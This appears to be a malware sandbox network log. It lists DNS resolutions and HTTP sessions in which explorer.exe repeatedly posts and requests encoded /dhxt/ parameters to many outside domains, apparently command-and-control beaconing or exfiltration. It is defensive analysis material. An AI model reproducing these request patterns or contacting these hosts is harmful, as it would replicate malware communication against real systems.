Feb 6, 2023 14:39:30.098217964 CET | 8.8.8.8 | 192.168.2.4 | 0xb1a9 | No error (0) | www.moneycarrewards.com | - | 199.59.243.222 | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:39:38.065663099 CET | 8.8.8.8 | 192.168.2.4 | 0x2a76 | No error (0) | www.cmproutdoors.com | - | 156.255.170.114 | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:39:46.256738901 CET | 8.8.8.8 | 192.168.2.4 | 0x65a9 | No error (0) | www.ontheverge.wales | s.multiscreensite.com | - | CNAME (Canonical name) | IN (0x0001) | false
Feb 6, 2023 14:39:46.256738901 CET | 8.8.8.8 | 192.168.2.4 | 0x65a9 | No error (0) | s.multiscreensite.com | global.multiscreensite.com | - | CNAME (Canonical name) | IN (0x0001) | false
Feb 6, 2023 14:39:46.256738901 CET | 8.8.8.8 | 192.168.2.4 | 0x65a9 | No error (0) | global.multiscreensite.com | d1-hitch-eu-nlb-e064e2845fd0c838.elb.eu-central-1.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001) | false
Feb 6, 2023 14:39:46.256738901 CET | 8.8.8.8 | 192.168.2.4 | 0x65a9 | No error (0) | d1-hitch-eu-nlb-e064e2845fd0c838.elb.eu-central-1.amazonaws.com | - | 3.127.73.216 | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:39:46.256738901 CET | 8.8.8.8 | 192.168.2.4 | 0x65a9 | No error (0) | d1-hitch-eu-nlb-e064e2845fd0c838.elb.eu-central-1.amazonaws.com | - | 3.67.141.185 | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:39:46.256738901 CET | 8.8.8.8 | 192.168.2.4 | 0x65a9 | No error (0) | d1-hitch-eu-nlb-e064e2845fd0c838.elb.eu-central-1.amazonaws.com | - | 18.193.36.153 | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:39:54.173079967 CET | 8.8.8.8 | 192.168.2.4 | 0x2a1a | No error (0) | www.0w3jy.com | hk.ygrcw.cn | - | CNAME (Canonical name) | IN (0x0001) | false
Feb 6, 2023 14:39:54.173079967 CET | 8.8.8.8 | 192.168.2.4 | 0x2a1a | No error (0) | hk.ygrcw.cn | - | 164.88.122.250 | A (IP address) | IN (0x0001) | false
Feb 6, 2023 14:40:02.761456013 CET | 8.8.8.8 | 192.168.2.4 | 0xc394 | No error (0) | www.frogair.online | frogair.online | - | CNAME (Canonical name) | IN (0x0001) | false
Feb 6, 2023 14:40:02.761456013 CET | 8.8.8.8 | 192.168.2.4 | 0xc394 | No error (0) | frogair.online | - | 81.169.145.72 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49695 | 63.141.242.45 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Feb 6, 2023 14:38:20.853791952 CET | 127 | OUT | GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=GMJpuu0CUPuENYia2wBq5vF0+NhzyO/+t2WdNBBbZP32/2p6mtsWQVykz4YrZzp7DrUWVvB/4Ftn1F9mFxE3fjZXBYQ8lylMnw== HTTP/1.1
                                                                                                              Host: www.utmedicined.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
Feb 6, 2023 14:38:21.002548933 CET | 128 | IN | HTTP/1.1 302 Found
                                                                                                              cache-control: max-age=0, private, must-revalidate
                                                                                                              connection: close
                                                                                                              content-length: 11
                                                                                                              date: Mon, 06 Feb 2023 13:38:20 GMT
                                                                                                              location: http://survey-smiles.com
                                                                                                              server: nginx
                                                                                                              set-cookie: sid=8552f4a2-a623-11ed-9d7e-70631573cfa6; path=/; domain=.utmedicined.com; expires=Sat, 24 Feb 2091 16:52:27 GMT; max-age=2147483647; HttpOnly
                                                                                                              Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                                              Data Ascii: Redirecting


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49696 | 172.67.156.58 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Feb 6, 2023 14:38:31.086448908 CET | 129 | OUT | POST /dhxt/ HTTP/1.1
                                                                                                              Host: www.b-yy.xyz
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.b-yy.xyz
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.b-yy.xyz/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Ascii: UlkAHnsI=vsXn(mqu(Kgwh-9Gc-Of2DOzunifKL(6wrVNYqeCcDjWhbw2Y44zG6cAgzpeyGNGgXZoxfg24SdphJbHeZ84SKNtc6imYE45u9IJzxZMU6huupoHJohYufKwrcHePkdlLKg3PfrVTG99Kwxv64ZCCj6VLStu2P413Cakh7WiwC8nOWm_Kw).
Feb 6, 2023 14:38:31.336332083 CET | 130 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:38:31 GMT
                                                                                                              Content-Type: text/plain
                                                                                                              Content-Length: 0
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qYk%2ByyWI8%2BKBOqUKIWZ%2FzQBAOVrPstFcImlKZszXqXNBMDKI0VFKP8EYPGrukEZ62xuVd%2FkjRBhWx7QmlOUc0spHVZa9dyBk%2BbBUIYVupqKpJiApF%2BQtYBPnegiSgAM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 795449604d29371c-FRA
                                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.4 | 49705 | 132.148.233.235 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2023 14:39:08.065886974 CET | 188 | OUT | GET /dhxt/?UlkAHnsI=ifokxT4WC6kpOYMw3zM3kyJ4LmgGiGZS0703YorY1YsjQRfHkIwKIIkPfqFmPEtQEdhteK5+EAiLfL0gYcUW2DoEXWveCWJMNw==&2ani-=qhGAdkIKoH HTTP/1.1
                                                                                                              Host: www.staciesellslka.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
Feb 6, 2023 14:39:08.339430094 CET | 189 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:39:08 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/7.4.33
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              Link: <https://www.staciesellslka.com/wp-json/>; rel="https://api.w.org/"
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Vary: Accept-Encoding,User-Agent
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Ascii: 247b<!DOCTYPE html><html class="avada-html-layout-wide avada-html-header-position-top" lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page not found &#8211; Lake Anna Real Estate</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//kestrel.idxhome.com' /><link rel="alternate" type="application/rss+xml" title="Lake Anna Real Estate &raquo; Feed" href="https://www.staciesellslka.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Lake Anna Real Estate &raquo; Comments Feed" href="https://www.staciesellslka.com/comments/feed/" /><link rel="shortcut icon
Feb 6, 2023 14:39:08.339492083 CET | 190 | IN |
                                                                                                              Data Ascii: " href="http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-64.jpg" type="image/x-icon" />... Apple Touch Icon --><link rel="apple-touch-icon" sizes="180x180" href="http://www.staciesellslka.com/wp-content/uploads/2023/
Feb 6, 2023 14:39:08.339524984 CET | 192 | IN |
                                                                                                              Data Ascii: m/wp-content/plugins/wp-zillow-review-slider/public/css/wprs_unslider.css?ver=2.7' type='text/css' media='all' /><link rel='stylesheet' id='unslider-dots-css' href='http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/publ
Feb 6, 2023 14:39:08.339555979 CET | 193 | IN |
                                                                                                              Data Ascii: ator" content="WordPress 6.1.1" /><style type="text/css"></style><script>window.ihfKestrel = window.ihfKestrel || {};ihfKestrel.config = {"activationToken":"66bf4a5f-38b4-417a-9c02-0c6d35b5332b","platform":"wordpress"}
Feb 6, 2023 14:39:08.339586973 CET | 194 | IN |
                                                                                                              Data Ascii: " as="font" type="font/ttf" crossorigin><link rel="preload" href="https://www.staciesellslka.com/wp-content/uploads/fusion-gfonts/dg4n_p3sv6gCJkwzT6RXiJwo.woff2" as="font" type="font/woff2" crossorigin><link rel="preload" href="https://www.sta
Feb 6, 2023 14:39:08.339618921 CET | 196 | IN |
                                                                                                              Data Ascii: y-small{ position: sticky; top: var(--awb-sticky-offset,0); }}@media screen and (min-width: 701px) and (max-width: 1177px){.fusion-no-medium-visibility{display:none !important;}body .md-text-align-center{text-align:center !important;}body .md-
Feb 6, 2023 14:39:08.339648962 CET | 197 | IN |
                                                                                                              Data Ascii: justify-content:flex-end !important;}body .lg-mx-auto{margin-left:auto !important;margin-right:auto !important;}body .lg-ml-auto{margin-left:auto !important;}body .lg-mr-auto{margin-right:auto !important;}body .fusion-absolute-position-large{p
Feb 6, 2023 14:39:08.339675903 CET | 198 | IN |
                                                                                                              Data Ascii: n-main-menu-search-overlay fusion-avatar-circle avada-dropdown-styles avada-blog-layout-large avada-blog-archive-layout-grid avada-header-shadow-no avada-menu-icon-position-left avada-has-megamenu-shadow avada-has-mainmenu-dropdown-divider ava
Feb 6, 2023 14:39:08.349338055 CET | 199 | IN |
                                                                                                              Data Ascii: 24fb"><div class="fusion-header-v3 fusion-logo-alignment fusion-logo-left fusion-sticky-menu- fusion-sticky-logo- fusion-mobile-logo-1 fusion-mobile-menu-design-modern"><div class="fusion-secondary-header"><div class="fusion-r
Feb 6, 2023 14:39:08.349756002 CET | 200 | IN |
                                                                                                              Data Ascii: ><div class="fusion-alignright"><div class="fusion-social-links-header"><div class="fusion-social-networks boxed-icons"><div class="fusion-social-networks-wrapper"><a class="fusion-social-network-icon fusion-tooltip fusion-facebo
Feb 6, 2023 14:39:08.506148100 CET | 202 | IN |
                                                                                                              Data Ascii: rrer"><span class="screen-reader-text">LinkedIn</span></a></div></div></div></div></div></div><div class="fusion-header-sticky-height"></div><div class="fusion-header"><div class="fusion-row"><div class="fusion-logo" data-mar


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.4 | 49706 | 154.205.192.37 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2023 14:39:14.383770943 CET | 253 | OUT | POST /dhxt/ HTTP/1.1
                                                                                                              Host: www.gmbuxie.net
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.gmbuxie.net
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.gmbuxie.net/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Ascii: UlkAHnsI=SlZf8uGeFgFdtR4Pd0GJmrTVMUKp~l1d5XV366S9xHOO3otpFWA-MxTo(Za-ddyciWKGG-OMrNR8fuVinxAsl3NR5aZR2FSqwYXR~J8zC3PKSKE7zztlPPVcsE1i~to_Pb~9A14TMJJSMck3AXm2QHnS38eAHQ0NmDuz(gInOCw-imAr~A).
Feb 6, 2023 14:39:14.559606075 CET | 253 | IN | HTTP/1.1 200 OK
                                                                                                              Server: nginx
                                                                                                              Date: Mon, 06 Feb 2023 13:39:14 GMT
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.4 | 49707 | 154.205.192.37 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2023 14:39:17.079830885 CET | 254 | OUT | GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=fnx//ZKuIyFV+ywUcXCMreymOGqG1X949mc4/IKLw0PV+ItzLTg5d1T/xYzfA/mrlDLEGtysh8NCeOJ7jTcJkgo8rK5p5nSJ6g== HTTP/1.1
                                                                                                              Host: www.gmbuxie.net
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
Feb 6, 2023 14:39:17.246885061 CET | 254 | IN | HTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Mon, 06 Feb 2023 13:39:17 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.4 | 49708 | 217.76.156.252 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2023 14:39:22.384221077 CET | 255 | OUT | POST /dhxt/ HTTP/1.1
                                                                                                              Host: www.lastmilerent.com
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.lastmilerent.com
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.lastmilerent.com/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Ascii: UlkAHnsI=V-UxaRzxh_PE(e(c1XCPydXJsl1egSlVqah78gsm3zt0DOvBYrXQJ0N2ofQEfHMEsfgTpgObFnk73hZHQlsHOQjuqh9387YadiyW2GoHKNVyxS8Y18ugZosG1wyIj8BSAihlPGVa(bUdA34O3Bm6TsdlcBz_EcTVgicGBmV5Y_wO2-LfhQ).
Feb 6, 2023 14:39:22.443350077 CET | 256 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:39:22 GMT
                                                                                                              Server: Apache
                                                                                                              X-ServerIndex: llim604
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Ascii: 1aa7<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.lastmilerent.com</title> <meta name="description" content="" /> <link rel="stylesheet" href="https://piensasolutions.com/css/parking2.css"> <link href='https://fonts.googleapis.com/css?family=Exo' rel='stylesheet' type='text/css'> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body>... client --><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <img src="https://piensasolutions.com/imgs/parking/icon-parking.png"> <p>Esta es la p&aacute;gina de:</p> <h1>www.lastmilerent.com</h1> </div


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.4 | 49709 | 217.76.156.252 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2023 14:39:24.987344980 CET | 263 | OUT | GET /dhxt/?UlkAHnsI=Y88RZnbUg+vg39XJ7Xe2z5ar6Steri0PsoUs6lQE0S1yE6fkUvOaIgRIh7ssJiEciN8m5Ru/FUUSgB9hFV8vRHrdywJO04cRIQ==&2ani-=qhGAdkIKoH HTTP/1.1
                                                                                                              Host: www.lastmilerent.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
Feb 6, 2023 14:39:25.047147989 CET | 265 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:39:25 GMT
                                                                                                              Server: Apache
                                                                                                              X-ServerIndex: llim603
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Ascii: 1aa7<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.lastmilerent.com</title> <meta name="description" content="" /> <link rel="stylesheet" href="https://piensasolutions.com/css/parking2.css"> <link href='https://fonts.googleapis.com/css?family=Exo' rel='stylesheet' type='text/css'> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body>... client --><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <img src="https://piensasolutions.com/imgs/parking/icon-parking.png"> <p>Esta es la p&aacute;gina de:</p> <h1>www.lastmilerent.com</h1> </div


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.4 | 49710 | 199.59.243.222 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2023 14:39:30.120506048 CET | 272 | OUT | POST /dhxt/ HTTP/1.1
                                                                                                              Host: www.moneycarrewards.com
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.moneycarrewards.com
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.moneycarrewards.com/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Ascii: UlkAHnsI=hvPAUVw9LsF3tFjEUUChsrJTw6LqHXrenX0vI2Az9Ixduk5pKm~1BDxXuTfUhM7jia09wbxj7-KILcHxh33e6qQc6jnmAXhFGmCSNxyz6yAOa9K7YF2ehRkM7P4ncfflMb76u0CxxFo4CidRbIk7oQQlUI1hc5athoQOS9jvfyCoQTtKmw).
Feb 6, 2023 14:39:30.323227882 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                              Server: openresty
                                                                                                              Date: Mon, 06 Feb 2023 13:39:30 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: parking_session=5cb1096a-46a2-01bb-32a5-fb76867238df; expires=Mon, 06-Feb-2023 13:54:30 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CzUJnRCI1KzW3BIkcQpjYMDLFohf6ZGuoHNbGFWkIsVZZalPmtRRnSbyv1y5n/9dvQsmKVg7SpaAum+TcihFGA==
                                                                                                              Cache-Control: no-cache
                                                                                                              Accept-CH: sec-ch-prefers-color-scheme
                                                                                                              Critical-CH: sec-ch-prefers-color-scheme
                                                                                                              Vary: sec-ch-prefers-color-scheme
                                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                              Cache-Control: no-store, must-revalidate
                                                                                                              Cache-Control: post-check=0, pre-check=0
                                                                                                              Pragma: no-cache
                                                                                                              Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.4 | 49711 | 199.59.243.222 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2023 14:39:32.673954010 CET | 274 | OUT | GET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=stngXlFCM6RnlHv9W0Owvb5Q7a/1GW7Bx3QsCD4j5Kk1nwRSFSS2AVlFvVf479jy1oAGro1MyvipTvqZ1lHNwKEX6xCFHE1kEA== HTTP/1.1
                                                                                                              Host: www.moneycarrewards.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
Feb 6, 2023 14:39:32.876430988 CET | 276 | IN | HTTP/1.1 200 OK
                                                                                                              Server: openresty
                                                                                                              Date: Mon, 06 Feb 2023 13:39:32 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: parking_session=c686acb8-3418-68a5-f20f-fa958a8a7e05; expires=Mon, 06-Feb-2023 13:54:32 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_G9yy01YMr2h5wTjj6Bf6E3kPY52BH3FeUE/WD7c3lnjvYAuz7HOqXcXrcooHgGc/g7orxVgT8VEk8Lr4gebVwA==
                                                                                                              Cache-Control: no-cache
                                                                                                              Accept-CH: sec-ch-prefers-color-scheme
                                                                                                              Critical-CH: sec-ch-prefers-color-scheme
                                                                                                              Vary: sec-ch-prefers-color-scheme
                                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                              Cache-Control: no-store, must-revalidate
                                                                                                              Cache-Control: post-check=0, pre-check=0
                                                                                                              Pragma: no-cache
                                                                                                              Data Ascii: 4cb<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_G9yy01YMr2h5wTjj6Bf6E3kPY52BH3FeUE/WD7c3lnjvYAuz7HOqXcXrcooHgGc/g7orxVgT8VEk8Lr4gebVwA=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" hre


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.4 | 49712 | 156.255.170.114 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2023 14:39:38.267879963 CET | 278 | OUT | POST /dhxt/ HTTP/1.1
                                                                                                              Host: www.cmproutdoors.com
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.cmproutdoors.com
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.cmproutdoors.com/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Ascii: UlkAHnsI=KfIVdkrwBL1Ihe5IfQyPHZIpvU7IqdDcLUeQIoG_hgJ3mML-b5uvkCxtztitFrtxP7JLL72yJMbB3-eCijIUpSZW8nYPEyu9dETmR5Wm(0SdGPY4c87fZfQoj56K6dWQfa34I95oGRqHuhlHTZAY3h~FdJyr3Sq8u7fA9HrllXci3yWKlg).
                                                                                                              Feb 6, 2023 14:39:38.467339993 CET | 278 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                              Server: nginx
                                                                                                              Date: Mon, 06 Feb 2023 13:39:38 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 162
                                                                                                              Connection: close
                                                                                                              Location: https://www.cmproutdoors.com/dhxt/
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                              18 | 192.168.2.4 | 49713 | 156.255.170.114 | 80 | C:\Windows\explorer.exe
                                                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                                                              Feb 6, 2023 14:39:41.003834009 CET | 279 | OUT | GET /dhxt/?UlkAHnsI=Hdg1eSHwHIdp18MOehnfDNNUuCDltrvSJkToDZ2NoA5/soeDYsGvmU4g1NuJE+12L7lxU5+TL8fcs8OKnDw+uls6plsXJT+jSQ==&2ani-=qhGAdkIKoH HTTP/1.1
                                                                                                              Host: www.cmproutdoors.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Feb 6, 2023 14:39:41.203809977 CET | 280 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                              Server: nginx
                                                                                                              Date: Mon, 06 Feb 2023 13:39:41 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 162
                                                                                                              Connection: close
                                                                                                              Location: https://www.cmproutdoors.com/dhxt/?UlkAHnsI=Hdg1eSHwHIdp18MOehnfDNNUuCDltrvSJkToDZ2NoA5/soeDYsGvmU4g1NuJE+12L7lxU5+TL8fcs8OKnDw+uls6plsXJT+jSQ==&2ani-=qhGAdkIKoH
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                              19 | 192.168.2.4 | 49714 | 3.127.73.216 | 80 | C:\Windows\explorer.exe
                                                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                                                              Feb 6, 2023 14:39:46.292882919 CET | 281 | OUT | POST /dhxt/ HTTP/1.1
                                                                                                              Host: www.ontheverge.wales
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.ontheverge.wales
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.ontheverge.wales/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Ascii: UlkAHnsI=Idm9u99lgY(mfQW_Ww3-v36l5py-UbeIHNuQmxPmMtJyxQU2xLLO~gZb30a6PBdpp3h-eRrfydufolHpTe8vtDw_Hz7xFFvya6RTXA8MzuDAJuUC24kpsGNQ(ttsH3P_P8pe5mXJdvPM0BRBOoaMxy8xZaGwR3h0dAKi6aO1d8QKGGM-xQ).
                                                                                                              Feb 6, 2023 14:39:46.313869953 CET | 281 | IN | HTTP/1.1 403 Forbidden
                                                                                                              Server: nginx
                                                                                                              Date: Mon, 06 Feb 2023 13:39:46 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Content-Encoding: gzip


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                              2 | 192.168.2.4 | 49697 | 172.67.156.58 | 80 | C:\Windows\explorer.exe
                                                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                                                              Feb 6, 2023 14:38:33.632235050 CET | 130 | OUT | GET /dhxt/?UlkAHnsI=iu/H8WHS+bo1nMJvRdq/iC6svF2/HYXNnbtNRbi1LgexvtsRTtlIctNP2ExBqlFb1kQrkeEU0URUxcClbqwbX/pXEbDFcWstrA==&2ani-=qhGAdkIKoH HTTP/1.1
                                                                                                              Host: www.b-yy.xyz
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Feb 6, 2023 14:38:33.877207041 CET | 131 | IN | HTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:38:33 GMT
                                                                                                              Content-Type: text/plain
                                                                                                              Content-Length: 0
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              CF-Cache-Status: DYNAMIC
